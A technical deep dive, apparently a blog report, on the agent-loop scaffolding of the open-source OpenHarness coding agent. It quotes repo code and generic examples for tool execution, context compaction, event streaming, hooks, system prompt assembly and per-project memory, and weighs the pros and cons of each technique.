
HKUDS/OpenHarness — A Deep Dive into Harness Techniques

A detailed analysis of the agent-loop scaffolding in HKUDS/OpenHarness — an "Open-source Python port of Claude Code" that ships with the ohmo personal agent integrating Feishu/Slack/Telegram/Discord. 30 techniques, with real code from the repo, pros/cons, and reference articles.
Date: 2026-04-20 · Author: Nghĩa & Cowork · Repo: HKUDS/OpenHarness · Commit analyzed: main branch · v0.1.7 · ~30k LOC Python

1. OpenHarness Overview

HKUDS/OpenHarness is an open-source Python implementation that mirrors (and extends) the architecture of Claude Code. Its short self-description in pyproject.toml: "Open-source Python port of Claude Code - an AI-powered CLI coding assistant". The repo publishes two main CLIs: openharness/oh/openh for the coding agent, and ohmo for the messaging-integrated personal agent.

This report analyzes the OpenHarness harness — the layers of scaffolding around the LLM call that turn a bare model into a coding agent able to run in a terminal, orchestrate subagents, handle channel messaging, and run CI automatically. The scope covers 7 topics across 15+ subsystems:

  • engine/ — agent loop (query.py 805 LOC), stream events, cost tracker
  • tools/ — 42 tools (Bash, Read, Edit, Grep, WebFetch, Task...) + Pydantic base
  • permissions/ — 3-mode checker, sensitive path protection, path rules
  • hooks/, plugins/, skills/, mcp/ — 4 extension surfaces
  • memory/, prompts/ — per-project memory + multi-layer system prompt
  • swarm/, coordinator/ — subprocess multi-agent with git worktree + mailbox (unique vs opencode)
  • channels/, services/, sandbox/, tasks/, autopilot/ — Slack/Feishu/Telegram/Discord bus, LSP AST, Docker sandbox, cron, repo autopilot (unique vs opencode)

What is a harness?

The coding-agent community has converged on "harness" as shorthand for everything that is not the model — that is: Agent = Model + Harness. Harness engineering is a subset of context engineering, revolving around context-window management, tool orchestration, state persistence, error recovery, verification, safety, and lifecycle.
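The Agent = Model + Harness split can be sketched as a minimal loop. This is a hedged illustration, not OpenHarness code: `call_model` and `run_tool` are hypothetical stand-ins for a provider SDK and a tool registry.

```python
# Minimal harness sketch: everything around call_model() is "harness".
# call_model / run_tool are hypothetical stand-ins, not OpenHarness APIs.

def run_agent(task: str, call_model, run_tool, max_turns: int = 10):
    messages = [{"role": "user", "content": task}]
    for _ in range(max_turns):                      # lifecycle: bounded turns
        reply = call_model(messages)                # the model
        if not reply.get("tool_calls"):             # natural stop
            return reply["text"]
        results = []
        for tc in reply["tool_calls"]:              # tool orchestration
            try:
                results.append(run_tool(tc))
            except Exception as exc:                # error recovery
                results.append(f"tool error: {exc}")
        messages.append({"role": "user", "content": results})
    return "max turns reached"                      # safety: hard stop
```

Everything a later section discusses — compaction, hooks, permissions, memory — slots into one of the commented points in this loop.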

What sets OpenHarness apart: compared to opencode (a TypeScript fork of sst/opencode), which revolves around a single-process agent, OpenHarness extends into an "agent organization" — multiple agent subprocesses, each with its own mailbox, worktree, and channel, orchestrated by a YAML-based coordinator. It is not just a coding agent; it is a runtime for many coding agents running in parallel.

Overall architecture

Data flow (reconstructed from the architecture diagram):

  • Entry points: User CLI (Typer) · Channels (Slack, Feishu, Discord, Telegram)
  • engine/query.py — run_query loop, async ReAct; receives inbox messages from the file-based swarm/mailbox + swarm/subprocess_backend; the coordinator spawns subagent subprocesses (git worktree isolated)
  • stream_events.py — 7 event types + CompactProgressEvent, streamed to the UI
  • Tool dispatch: tools/ (42 tools, Pydantic schema) · permissions/ checker (6-layer eval, sensitive path block) · mcp/client/manager (stdio + HTTP transport)
  • Tool backends: services/lsp (Python AST) · services/cron · sandbox/docker
  • Cross-cutting: hooks/executor (4 hook types, 6 events, hot reload) · memory/ (per-project MEMORY.md, SHA1 hash)

Tech stack

| Layer | Technology | Notes |
|---|---|---|
| Runtime | Python ≥3.10 | asyncio throughout, Pydantic v2 strict |
| Language | Python | mypy strict, ruff lint (line length 100) |
| AI SDKs | Anthropic ≥0.40 + OpenAI ≥1.0 | Provider abstraction via api_client |
| CLI | Typer ≥0.12 | Subcommand layout |
| TUI | Rich + Textual ≥0.80 + React Ink | Dual TUI: Python native + React-based |
| Validation | Pydantic v2 | Tool input models generate JSON schema |
| HTTP | httpx ≥0.27 + websockets ≥12 | Async; Feishu WebSocket long connection |
| MCP | mcp ≥1.0 (Python SDK) | stdio + HTTP transport |
| Channels | slack-sdk, discord.py, python-telegram-bot, lark-oapi | 4 first-class bot SDKs |
| Cron | croniter ≥2.0 + watchfiles | Persistent job scheduler |
| Sandbox | Docker SDK (optional) | Tool execution isolation |

Summary of the 30 techniques

ID Technique Theme
T1 Async ReAct + branching single/parallel tool execution Loop
T2 Auto-compact before-turn + reactive on overflow Loop
T3 Stream events union + CompactProgressEvent 9-phase Loop
T4 Pre/Post tool hook interception Loop
T5 Tool metadata carryover across turns Loop
T6 Multi-layer system prompt assembly (9 sections) Context
T7 CLAUDE.md cascading discovery upward Context
T8 Per-project memory isolation (SHA1 hash) Context
T9 Token-based memory search + CJK tokenizer Context
T10 Pydantic tool base + auto JSON schema Tool
T11 Per-tool output truncation + UTF-8 normalization Tool
T12 Bash interactive preflight + PTY + graceful timeout Tool
T13 Ripgrep-first Glob/Grep + Python fallback Tool
T14 Markdown skill system + frontmatter Ecosystem
T15 Hook lifecycle (6 events · 4 types · hot reload) Ecosystem
T16 Plugin manifest-based loading Ecosystem
T17 MCP stdio + HTTP + dynamic Pydantic adapter Ecosystem
T18 3-mode permission (DEFAULT / PLAN / FULL_AUTO) Permission
T19 Built-in sensitive path protection (hardcoded glob) Permission
T20 6-layer hierarchical permission evaluation Permission
T21 Async interactive approval + UUID + 300s timeout Permission
T22 Subprocess-based subagent spawning Swarm ★
T23 File-based async mailbox with atomic writes Swarm ★
T24 Dual-channel permission sync protocol Swarm ★
T25 Git worktree isolation per agent Swarm ★
T26 YAML agent definitions + coordinator Swarm ★
T27 Multi-channel bus (Slack/Feishu/Discord/Telegram/Matrix) Integrations ★
T28 LSP-based code intelligence via Python AST Integrations ★
T29 Docker sandbox for tool execution Integrations ★
T30 Cron scheduler + persistent background tasks Integrations ★

★ = features unique to OpenHarness (not in opencode core). Total: 9 unique techniques; the other 21 share their core ideas with opencode/Claude Code but are implemented in Python idiom.

A. Agent Loop & Streaming — 5 techniques

The engine is the heart of the OpenHarness harness: engine/query.py (805 LOC) contains the run_query coroutine — an async generator that emits stream events for the UI. Notable points: the loop branches between sequential (1 tool) and parallel (2+ tools via asyncio.gather) execution, auto-compacts right before each turn, intercepts pre/post tool hooks, and carries tool metadata over across multiple compactions.

T1. Async ReAct loop with single/parallel tool branching

A.1
File: src/openharness/engine/query.py · Function: run_query() · Lines: 516–651

Code from OpenHarness

turn_count = 0
while context.max_turns is None or turn_count < context.max_turns:
    turn_count += 1
    # --- auto-compact check before calling the model ---------------
    async for event, usage in _stream_compaction(trigger="auto"):
        yield event, usage
    messages, was_compacted = last_compaction_result

    final_message: ConversationMessage | None = None
    async for event in context.api_client.stream_message(
        ApiMessageRequest(
            model=context.model,
            messages=messages,
            system_prompt=context.system_prompt,
            tools=context.tool_registry.to_api_schema(),
        )
    ):
        if isinstance(event, ApiTextDeltaEvent):
            yield AssistantTextDelta(text=event.text), None
        elif isinstance(event, ApiMessageCompleteEvent):
            final_message = event.message

    if not final_message.tool_uses:
        return  # natural end of turn

    tool_calls = final_message.tool_uses
    if len(tool_calls) == 1:
        # Single tool: sequential (stream events immediately)
        tc = tool_calls[0]
        yield ToolExecutionStarted(tool_name=tc.name, tool_input=tc.input), None
        result = await _execute_tool_call(context, tc.name, tc.id, tc.input)
        yield ToolExecutionCompleted(
            tool_name=tc.name, output=result.content, is_error=result.is_error
        ), None
        tool_results = [result]
    else:
        # Multiple tools: execute concurrently, emit events after
        for tc in tool_calls:
            yield ToolExecutionStarted(tool_name=tc.name, tool_input=tc.input), None
        # return_exceptions=True avoids orphan tool_use blocks
        raw_results = await asyncio.gather(
            *[_run(tc) for tc in tool_calls], return_exceptions=True
        )
        # wrap exceptions into ToolResultBlock(is_error=True)
        ...
    messages.append(ConversationMessage(role="user", content=tool_results))
Why it matters: most simple Python harnesses run tools sequentially because it keeps state management easy. OpenHarness branches: with a single tool it emits events in realtime (smooth UX); with several tools it uses asyncio.gather to cut latency. Most important is return_exceptions=True: if one tool raises, the others are not cancelled. The reason is carefully commented: the Anthropic API rejects the next request if any tool_use lacks a corresponding tool_result.

Code example (generic)

async def run_agent_turn(messages, tools):
    resp = await llm.call(messages, tools)
    if not resp.tool_uses:
        return resp
    if len(resp.tool_uses) == 1:
        tc = resp.tool_uses[0]
        results = [await exec_tool(tc)]
    else:
        # CRITICAL: return_exceptions=True —
        # otherwise a failed tool leaves siblings cancelled
        # → orphan tool_use blocks → next API call rejected
        raw = await asyncio.gather(
            *[exec_tool(tc) for tc in resp.tool_uses],
            return_exceptions=True,
        )
        results = [wrap_exception(tc, r) for tc, r in zip(resp.tool_uses, raw)]
    messages.append({"role": "user", "content": results})
    return results
Pros
  • Parallel execution cuts latency when tools are independent (e.g. Read 3 files at once)
  • The single-tool path still streams events in realtime — no UX delay
  • return_exceptions=True guards against the orphan tool_use bug
  • async-native, no thread pool needed
Cons
  • Parallel race conditions if tools edit the same file — no ordering enforced
  • Unbounded concurrency with many tool calls → can overload disk/API
  • Interleaved side effects are hard to debug
  • No turn-wide cancel/timeout mechanism like opencode's Effect.Stream

T2. Auto-compact before-turn + reactive on overflow

A.2
File: src/openharness/engine/query.py · Lines: 519–562 · Service: services/compact/ · Constant: AUTOCOMPACT_BUFFER_TOKENS = 13_000

Code from OpenHarness

# 1. Before-turn auto-compact
async for event, usage in _stream_compaction(trigger="auto"):
    yield event, usage
messages, was_compacted = last_compaction_result

# 2. Reactive compact when the provider returns prompt-too-long
except Exception as exc:
    error_msg = str(exc)
    if not reactive_compact_attempted and _is_prompt_too_long_error(exc):
        reactive_compact_attempted = True
        yield StatusEvent(message=REACTIVE_COMPACT_STATUS_MESSAGE), None
        async for event, usage in _stream_compaction(trigger="reactive", force=True):
            yield event, usage
        messages, was_compacted = last_compaction_result
        if was_compacted:
            continue  # retry the turn with compacted messages

# 3. services/compact/microcompact.py — cheap, fast first pass:
#    drop stale ToolResultBlock content (keep tool_use structure)
# 4. services/compact/summary.py — LLM summarize when microcompact is not enough
# 5. services/compact/ptl_retry.py — truncate_head_for_ptl_retry():
#    last-chance head truncation when reactive compact still overflows
Why it matters: three tiers of compaction defense: (1) proactive — before each turn, estimate tokens and, if near the limit, run microcompact to delete old tool_result content; (2) reactive — when the API returns 400 "prompt too long", retry with an LLM summary; (3) last-resort — if it still overflows, truncate head messages. This keeps long sessions (hundreds of turns) from dying. The 13k-token buffer is headroom for the next turn's response + tool output.

Code example (generic)

class CompactionOrchestrator:
    async def maybe_compact(self, messages, trigger="auto"):
        estimate = self.token_counter.estimate(messages)
        if estimate < self.threshold:
            return messages, False
        # Phase 1: cheap — drop old ToolResultBlock content only
        pruned = self.microcompact(messages)
        if self.token_counter.estimate(pruned) < self.threshold:
            return pruned, True
        # Phase 2: expensive — LLM summarize
        summary = await self.llm_summarize(pruned)
        return [system_prompt, summary] + pruned[-5:], True

    async def run_turn(self, messages):
        messages, _ = await self.maybe_compact(messages)
        try:
            return await llm.call(messages)
        except PromptTooLongError:
            messages, _ = await self.maybe_compact(messages, trigger="reactive")
            return await llm.call(messages)  # one retry
Pros
  • Three-tier graceful degradation — cheap first, expensive later
  • Long sessions survive without user intervention
  • Reactive fallback covers token-estimate errors
  • Progress events let the UI show compaction in flight
Cons
  • LLM summarization risks losing important information
  • The 13k buffer is arbitrary — not tuned per model
  • Head truncation may drop system hints / CLAUDE.md context
  • If the reactive pass fails a second time, the agent dies (no third fallback)
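The proactive tier hinges on a cheap token estimate checked against the model limit minus the buffer. A minimal sketch of that check — the chars/4 heuristic and the function names here are illustrative assumptions, not the repo's estimator:

```python
AUTOCOMPACT_BUFFER_TOKENS = 13_000  # headroom for next response + tool output

def estimate_tokens(messages: list[dict]) -> int:
    # Crude heuristic: ~4 chars per token, plus fixed per-message overhead.
    chars = sum(len(str(m.get("content", ""))) for m in messages)
    return chars // 4 + 8 * len(messages)

def should_compact(messages: list[dict], context_limit: int) -> bool:
    # Compact when the estimate eats into the reserved buffer.
    return estimate_tokens(messages) >= context_limit - AUTOCOMPACT_BUFFER_TOKENS
```

An exact tokenizer is unnecessary here precisely because the reactive tier catches estimation errors; the heuristic only has to be cheap and roughly monotonic.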

T3. Streaming events union + CompactProgressEvent 9-phase

A.3
File: src/openharness/engine/stream_events.py · Lines: entire file

Code from OpenHarness

from dataclasses import dataclass
from typing import Literal, Union

# 7 event types yielded from run_query()

@dataclass(frozen=True)
class AssistantTextDelta:
    text: str

@dataclass(frozen=True)
class AssistantTurnComplete:
    message: ConversationMessage
    usage: UsageSnapshot

@dataclass(frozen=True)
class ToolExecutionStarted:
    tool_name: str
    tool_input: dict

@dataclass(frozen=True)
class ToolExecutionCompleted:
    tool_name: str
    output: object
    is_error: bool

@dataclass(frozen=True)
class StatusEvent:
    message: str

@dataclass(frozen=True)
class ErrorEvent:
    message: str

@dataclass(frozen=True)
class CompactProgressEvent:
    phase: Literal[
        "hooks_start",
        "context_collapse_start",
        "context_collapse_end",
        "session_memory_start",
        "session_memory_end",
        "compact_start",
        "compact_retry",
        "compact_end",
        "compact_failed",
    ]
    message: str

StreamEvent = Union[
    AssistantTextDelta, AssistantTurnComplete, ToolExecutionStarted,
    ToolExecutionCompleted, StatusEvent, ErrorEvent, CompactProgressEvent,
]
Why it matters: instead of a vague dict[str, Any] union, OpenHarness uses a tagged union of @dataclass(frozen=True) types. The Rich/Textual UI pattern-matches each event type with isinstance() — mypy strict guarantees no case is missed. The standout event is CompactProgressEvent with its 9 phases: the UI can show a detailed progress bar (collapsing context → saving memory → summarizing → done/failed) instead of just "compacting...". This level of observability is rare in a Python port.

Code example (generic)

from typing import Union
from dataclasses import dataclass

@dataclass(frozen=True)
class TextDelta:
    text: str

@dataclass(frozen=True)
class ToolStart:
    tool: str
    input: dict

@dataclass(frozen=True)
class ToolEnd:
    tool: str
    output: str
    error: bool

Event = Union[TextDelta, ToolStart, ToolEnd]

async def render_events(gen):
    async for ev in gen:
        match ev:
            case TextDelta(text):
                console.print(text, end="")
            case ToolStart(tool, _):
                ui.mark_tool(tool, "running")
            case ToolEnd(tool, _, error):
                ui.mark_tool(tool, "error" if error else "done")
Pros
  • Type-safe: mypy strict catches missed cases
  • UI logic is decoupled from the engine
  • CompactProgressEvent's 9 phases → detailed UX during compaction
  • Easy to serialize to JSON for a remote UI
Cons
  • Adding an event type requires updates in several places (engine + UI + tests)
  • Frozen dataclasses are immutable → no in-place accumulation (a new object per delta)
  • No ID linking parent-child events (tool_start ↔ tool_end must be matched by tool_name)
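That last limitation — matching start/end events by tool_name — breaks down when two calls to the same tool run in parallel. A common fix is to carry the provider's tool_use id on both events; the sketch below is a hedged illustration of that alternative, not OpenHarness code:

```python
# Hypothetical id-correlated events: pairing by call_id instead of tool_name
# stays unambiguous even with two parallel calls to the same tool.
from dataclasses import dataclass

@dataclass(frozen=True)
class ToolStart:
    call_id: str   # provider tool_use id
    tool: str

@dataclass(frozen=True)
class ToolEnd:
    call_id: str
    output: str
    error: bool

def pair_events(events) -> dict[str, tuple]:
    started, pairs = {}, {}
    for ev in events:
        if isinstance(ev, ToolStart):
            started[ev.call_id] = ev
        elif isinstance(ev, ToolEnd) and ev.call_id in started:
            pairs[ev.call_id] = (started[ev.call_id], ev)
    return pairs
```

The cost is one extra field per event; the gain is that a UI can keep per-call spinners correct under asyncio.gather.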

T4. Pre/Post tool hook interception

A.4
File: src/openharness/engine/query.py · Function: _execute_tool_call() · Lines: 654–720

Code from OpenHarness

async def _execute_tool_call(
    context: QueryContext,
    tool_name: str,
    tool_use_id: str,
    tool_input: dict[str, object],
) -> ToolResultBlock:
    # ---- PRE_TOOL_USE hook ----
    if context.hook_executor is not None:
        pre_hooks = await context.hook_executor.execute(
            HookEvent.PRE_TOOL_USE,
            {"tool_name": tool_name, "tool_input": tool_input,
             "event": HookEvent.PRE_TOOL_USE.value},
        )
        if pre_hooks.blocked:
            return ToolResultBlock(
                tool_use_id=tool_use_id,
                content=pre_hooks.reason or f"pre_tool_use hook blocked {tool_name}",
                is_error=True,
            )
    # ---- Actual tool execution ----
    result = await context.tool_registry.execute(tool_name, tool_input, ...)
    # ---- POST_TOOL_USE hook (observation only, cannot block) ----
    if context.hook_executor is not None:
        await context.hook_executor.execute(
            HookEvent.POST_TOOL_USE,
            {"tool_name": tool_name, "tool_input": tool_input,
             "tool_result": result.content, "is_error": result.is_error},
        )
    return result
Why it matters: hooks let users/plugins inject policy outside the permission system — for example: block git push after 6pm, log bash commands to a SIEM, validate Edit patterns. A PRE hook can return blocked=True → short-circuit into a ToolResultBlock error (the LLM sees an ordinary tool failure and adjusts on its own). POST hooks only observe — they cannot undo an execution that already finished. The design mirrors Claude Code hooks (see code.claude.com/docs/en/hooks).

Code example (generic)

class HookExecutor:
    async def execute(self, event: HookEvent, payload: dict) -> HookResult:
        blocked, reason = False, None
        for hook in self.hooks.get(event, []):
            res = await hook.run(payload)
            if res.blocked:
                blocked, reason = True, res.reason
                break
        return HookResult(blocked=blocked, reason=reason)

# Usage inside tool execution
async def run_tool(name, args):
    pre = await hooks.execute(HookEvent.PRE_TOOL_USE, {"tool_name": name, "args": args})
    if pre.blocked:
        return {"error": pre.reason or "blocked by hook"}
    result = await tool.execute(args)
    await hooks.execute(HookEvent.POST_TOOL_USE, {"tool_name": name, "result": result})
    return result
Pros
  • Policy separated from the permission system — two layers of protection
  • PRE can block; POST can audit/log
  • Hot-reload of hooks via HookReloader watching mtime
  • Shell/Prompt/HTTP/Agent hook types — versatile
Cons
  • Hooks run synchronously in the hot path → latency on every tool call
  • Prompt hooks call the LLM → cost + races with the main loop
  • No "retry with modified args" — only block or pass
  • A misconfigured hook can leave the agent stuck and hard to debug

T5. Tool metadata carryover across turns

A.5
File: src/openharness/engine/query.py · Lines: 146–250 · Struct: QueryContext (deque-based tracking)

Code from OpenHarness

from collections import deque

@dataclass
class QueryContext:
    # Recent work tracking — persisted across compaction rounds
    recent_goals: deque[str] = field(default_factory=lambda: deque(maxlen=5))
    recent_reads: deque[str] = field(default_factory=lambda: deque(maxlen=6))
    active_artifacts: deque[str] = field(default_factory=lambda: deque(maxlen=8))
    async_agent_tasks: deque[AgentTaskRef] = field(default_factory=lambda: deque(maxlen=12))
    work_log: deque[WorkLogEntry] = field(default_factory=lambda: deque(maxlen=10))
    ...

# Updated on every ToolExecutionCompleted:
def record_tool_execution(ctx: QueryContext, tc: ToolUseBlock, result: ToolResultBlock):
    if tc.name == "Read":
        path = tc.input.get("file_path")
        if path:
            ctx.recent_reads.append(path)
    elif tc.name == "Write" or tc.name == "Edit":
        path = tc.input.get("file_path")
        if path:
            ctx.active_artifacts.append(path)
    elif tc.name == "Task":
        ctx.async_agent_tasks.append(AgentTaskRef(id=..., status="pending"))
    ctx.work_log.append(WorkLogEntry(tool=tc.name, ts=time.time(), ok=not result.is_error))

# When compact happens, these deques get injected into the summary:
# "Recently read: path1, path2, ..."
# "Active artifacts: draft.md, report.html, ..."
# "Pending subagents: task-abc (status=running), ..."
Why it matters: when compaction drops old messages, the carryover deques survive. On the next call, the summary prompt injects: "The agent has read X, is editing Y, has task Z running". This addresses compaction's biggest pain point: the agent "losing its memory" of the work in progress. Each deque has a small maxlen (5, 6, 8, 10, 12) → bounded, never overflows on its own.

Code example (generic)

from collections import deque

class AgentMemory:
    def __init__(self):
        self.recent_goals = deque(maxlen=5)
        self.recent_reads = deque(maxlen=6)
        self.active_artifacts = deque(maxlen=8)
        self.pending_tasks = deque(maxlen=12)

    def on_tool(self, name, args, ok):
        if name == "Read":
            self.recent_reads.append(args["file_path"])
        elif name in ("Write", "Edit"):
            self.active_artifacts.append(args["file_path"])
        elif name == "Task":
            self.pending_tasks.append(args["id"])

    def summary_block(self) -> str:
        return (
            f"Recent files read: {', '.join(self.recent_reads)}\n"
            f"Active artifacts: {', '.join(self.active_artifacts)}\n"
            f"Pending subagents: {', '.join(self.pending_tasks)}"
        )

# Inject into the compact summary prompt:
compact_msg = f"Previous conversation summary: ...\n\n{memory.summary_block()}"
Pros
  • Reduces post-compaction "amnesia"
  • Bounded deques → predictable memory
  • Structural metadata → easy to render in the UI
  • Can be injected into the system prompt every turn (not only at compaction)
Cons
  • Tracking logic is hard-coded per tool — must be updated when tools are added
  • Records the "what" but not the "why" — the agent knows it read X but not the reason
  • Deque maxlens are arbitrary — very long sessions still overflow them
  • May duplicate information already in the LLM-generated summary

B. Context & Memory — 4 techniques

OpenHarness splits context into 3 layers: (1) system prompt — assembled dynamically each turn from 9 sections; (2) CLAUDE.md — project-local rules, cascading from cwd up to the root; (3) persistent memory — per-project file-based notes, searched against the current query. The difference vs opencode: OpenHarness has its own long-term memory store (MEMORY.md), while opencode relies solely on AGENTS.md/CLAUDE.md.

T6. Multi-layer system prompt assembly (9 sections)

B.1
File: src/openharness/prompts/context.py · Function: build_system_prompt() · Lines: 74–158

Code from OpenHarness

def build_system_prompt(ctx: PromptContext) -> str:
    sections: list[str] = []
    # 1. Base role — persona + operating principles
    sections.append(BASE_PROMPT)
    # 2. Environment — cwd, platform, python, git branch, model
    sections.append(_build_env_section(ctx))
    # 3. Effort + reasoning passes (thinking mode hint)
    if ctx.effort:
        sections.append(_build_effort_section(ctx.effort, ctx.passes))
    # 4. Skills — discovered skills injected as "tools-of-tools"
    if ctx.skills:
        sections.append(_build_skills_section(ctx.skills))
    # 5. Delegation — when subagents are available
    if ctx.subagent_definitions:
        sections.append(_build_delegation_section(ctx.subagent_definitions))
    # 6. CLAUDE.md — cascading from cwd to root
    if ctx.claudemd_content:
        sections.append(f"# Local project rules (CLAUDE.md)\n{ctx.claudemd_content}")
    # 7. Local rules (.claude/rules/*.md)
    if ctx.local_rules:
        sections.append(_build_local_rules(ctx.local_rules))
    # 8. Issue/PR context (when running in GitHub autopilot)
    if ctx.issue_or_pr:
        sections.append(_build_issue_section(ctx.issue_or_pr))
    # 9. Relevant memories (top-k from memory search)
    if ctx.relevant_memories:
        sections.append(_build_memories_section(ctx.relevant_memories))
    return "\n\n---\n\n".join(sections)
Why it matters: the prompt is not static — it is rebuilt atomically every turn. When the user moves to another file, ctx.claudemd_content changes → the prompt changes. When a memory search hits something new → the memories section differs. It is cache-aware: stable sections (1-5) come first, volatile sections (6-9) last → Anthropic prefix caching still hits on the head and only invalidates the tail.

Code example (generic)

@dataclass
class PromptContext:
    cwd: Path
    model: str
    effort: str | None
    claudemd_content: str | None
    subagent_definitions: list[AgentDef]
    relevant_memories: list[MemoryHeader]

def build_system_prompt(ctx: PromptContext) -> str:
    parts = [
        BASE_ROLE,                                  # 1. stable
        build_env(ctx),                             # 2. stable per session
        build_effort(ctx.effort),                   # 3. stable per mode
        build_subagents(ctx.subagent_definitions),  # 4. stable
        build_claudemd(ctx.claudemd_content),       # 5. changes when cwd changes
        build_memories(ctx.relevant_memories),      # 6. changes every turn
    ]
    return "\n\n---\n\n".join(p for p in parts if p)
Pros
  • Modular — each section is independently testable
  • Cache-aware ordering (stable first, dynamic last)
  • Explicit conditions — sections are skipped when there is no data
  • The --- delimiter helps the LLM parse section boundaries
Cons
  • 9 sections → the system prompt can get very long (10k+ tokens)
  • Rebuilt every turn → prompt caching is fragile if the cache key is not stable
  • No token budget per section — a large CLAUDE.md can easily dominate
  • Section order is hard-coded, hard to customize
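The missing per-section budget is straightforward to retrofit: cap each section before joining so no single source can dominate. A hedged sketch — the budget values and names here are illustrative assumptions, not OpenHarness code:

```python
# Hypothetical per-section character budgets; one oversized CLAUDE.md
# can no longer swallow the whole prompt.
SECTION_BUDGET_CHARS = {"claudemd": 12_000, "memories": 4_000}

def join_sections(sections: dict[str, str], default_budget: int = 8_000) -> str:
    parts = []
    for name, text in sections.items():
        budget = SECTION_BUDGET_CHARS.get(name, default_budget)
        if len(text) > budget:
            text = text[:budget] + "\n... [section truncated]"
        if text:
            parts.append(text)
    return "\n\n---\n\n".join(parts)
```

Character budgets are a crude proxy for tokens, but they keep the assembled prompt's size predictable without a tokenizer in the hot path.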

T7. CLAUDE.md cascading discovery upward

B.2
File: src/openharness/prompts/claudemd.py · Function: discover_claudemd() · Lines: 8–48 · Truncate: 12000 chars/file

Code from OpenHarness

def discover_claudemd(cwd: Path, *, max_chars: int = 12000) -> str:
    collected: list[tuple[Path, str]] = []
    seen: set[Path] = set()
    # Walk upward from cwd to filesystem root
    current = cwd.resolve()
    while True:
        for candidate in (
            current / "CLAUDE.md",
            current / ".claude" / "CLAUDE.md",
        ):
            if candidate.exists() and candidate not in seen:
                seen.add(candidate)
                content = candidate.read_text(encoding="utf-8", errors="replace")
                if len(content) > max_chars:
                    content = content[:max_chars] + f"\n\n... [truncated at {max_chars} chars]"
                collected.append((candidate, content))
        # Also collect .claude/rules/*.md at each level
        rules_dir = current / ".claude" / "rules"
        if rules_dir.is_dir():
            for rule in sorted(rules_dir.glob("*.md")):
                if rule not in seen:
                    seen.add(rule)
                    collected.append((rule, rule.read_text(...)))
        if current.parent == current:
            break  # reached root
        current = current.parent
    # Reverse so root-level rules come first, leaf rules last (last wins)
    collected.reverse()
    return "\n\n".join(f"## {p.relative_to(cwd) if ...}\n\n{c}" for p, c in collected)
Why it matters: a monorepo has a CLAUDE.md at the root (shared rules) plus at sub-package level (specialized rules). Walking upward and deduplicating by path ensures nothing is missed and nothing is duplicated. The final reverse lets leaf rules (near cwd) override root rules — a "last wins" pattern like .gitignore. Truncating at 12k chars/file keeps one huge rules file from swallowing the whole prompt budget.

Code example (generic)

def find_up(cwd: Path, filenames: list[str]) -> list[Path]:
    """Walk upward from cwd to root, collecting matching files."""
    found, seen = [], set()
    current = cwd.resolve()
    while True:
        for name in filenames:
            p = current / name
            if p.exists() and p not in seen:
                seen.add(p)
                found.append(p)
        if current.parent == current:
            break
        current = current.parent
    return found

def assemble_rules(cwd: Path) -> str:
    files = find_up(cwd, ["CLAUDE.md", ".claude/CLAUDE.md", "AGENTS.md"])
    # Root-first so leaf overrides (last-wins)
    files.reverse()
    return "\n\n".join(f.read_text()[:12000] for f in files)
Pros
  • Monorepo-friendly — rules per sub-package
  • Dedup by path — CLAUDE.md + .claude/CLAUDE.md never double-counted
  • Per-file truncation → predictable size
  • Last-wins like .gitignore — a familiar mental model
Cons
  • Walking to the root can read files outside the project (home dir)
  • No semantic merge — just concatenation
  • Truncation cuts mid-sentence and can corrupt markdown
  • Does not respect .gitignore for the rules dir

T8. Per-project memory isolation with SHA1 hash

B.3
File: src/openharness/memory/paths.py · Function: get_project_memory_dir() · Lines: 11–22

Code from OpenHarness

from hashlib import sha1
from pathlib import Path
from openharness.config.paths import get_data_dir

def get_project_memory_dir(cwd: str | Path) -> Path:
    """Return the persistent memory directory for a project."""
    path = Path(cwd).resolve()
    digest = sha1(str(path).encode("utf-8")).hexdigest()[:12]
    memory_dir = get_data_dir() / "memory" / f"{path.name}-{digest}"
    memory_dir.mkdir(parents=True, exist_ok=True)
    return memory_dir

def get_memory_entrypoint(cwd: str | Path) -> Path:
    """Return the project memory entrypoint file."""
    return get_project_memory_dir(cwd) / "MEMORY.md"

# Result: ~/.openharness/memory/{project-name}-{sha1[:12]}/
# ├── MEMORY.md        ← entrypoint (index)
# ├── architecture.md  ← topic memory
# ├── api-design.md
# └── ...
Why it matters: two projects with the same name (e.g. two clones of repo app) at different paths never mix memories. SHA1 of the absolute path → unique yet still readable, since the dir name also includes path.name. File-based (no DB) → portable; users can back up, copy, or inspect it by hand. MEMORY.md is the index file — other topic files link from it (like an Obsidian vault).

Code example (generic)

from hashlib import sha1
from pathlib import Path

def project_memory_dir(cwd: Path, data_root: Path) -> Path:
    """Stable, collision-resistant dir per project path."""
    abs_path = cwd.resolve()
    digest = sha1(str(abs_path).encode()).hexdigest()[:12]
    d = data_root / "memory" / f"{abs_path.name}-{digest}"
    d.mkdir(parents=True, exist_ok=True)
    return d

# Usage
mem_dir = project_memory_dir(Path.cwd(), Path.home() / ".myagent")
# → ~/.myagent/memory/app-a3f8b7c1d2e5/
Pros
  • Zero collisions between same-named projects
  • Readable — the dir contains the project name
  • File-based → trivial backup/versioning
  • Lazy mkdir — nothing is created until needed
Cons
  • Moving the project (mv /a → /b) "loses" the memory, since the hash changes
  • SHA1's crypto strength is unnecessary here; it was chosen for simplicity — newcomers may wonder "who is attacking?"
  • A 12-char digest can still collide (~1 in 10^14) on very large installations
  • The project name in the dir can leak sensitive information

T9. Token-based memory search with CJK support

B.4
File: src/openharness/memory/search.py · Function: find_relevant_memories() · Lines: 12–49

Code from OpenHarness

def find_relevant_memories(query: str, cwd, *, max_results=5) -> list[MemoryHeader]:
    tokens = _tokenize(query)
    if not tokens:
        return []
    scored: list[tuple[float, MemoryHeader]] = []
    for header in scan_memory_files(cwd, max_files=100):
        meta = f"{header.title} {header.description}".lower()
        body = header.body_preview.lower()
        # Metadata matches weighted 2x; body matches 1x.
        meta_hits = sum(1 for t in tokens if t in meta)
        body_hits = sum(1 for t in tokens if t in body)
        score = meta_hits * 2.0 + body_hits
        if score > 0:
            scored.append((score, header))
    # Rank by score desc, then recency desc (tie-break)
    scored.sort(key=lambda item: (-item[0], -item[1].modified_at))
    return [header for _, header in scored[:max_results]]

def _tokenize(text: str) -> set[str]:
    """Extract search tokens, handling ASCII + Han ideographs."""
    # ASCII word tokens (3+ chars) — filter out stopwords like "the"
    ascii_tokens = {t for t in re.findall(r"[A-Za-z0-9_]+", text.lower()) if len(t) >= 3}
    # Han ideographs (each character carries independent meaning)
    han_chars = set(re.findall(r"[\u4e00-\u9fff\u3400-\u4dbf]", text))
    return ascii_tokens | han_chars
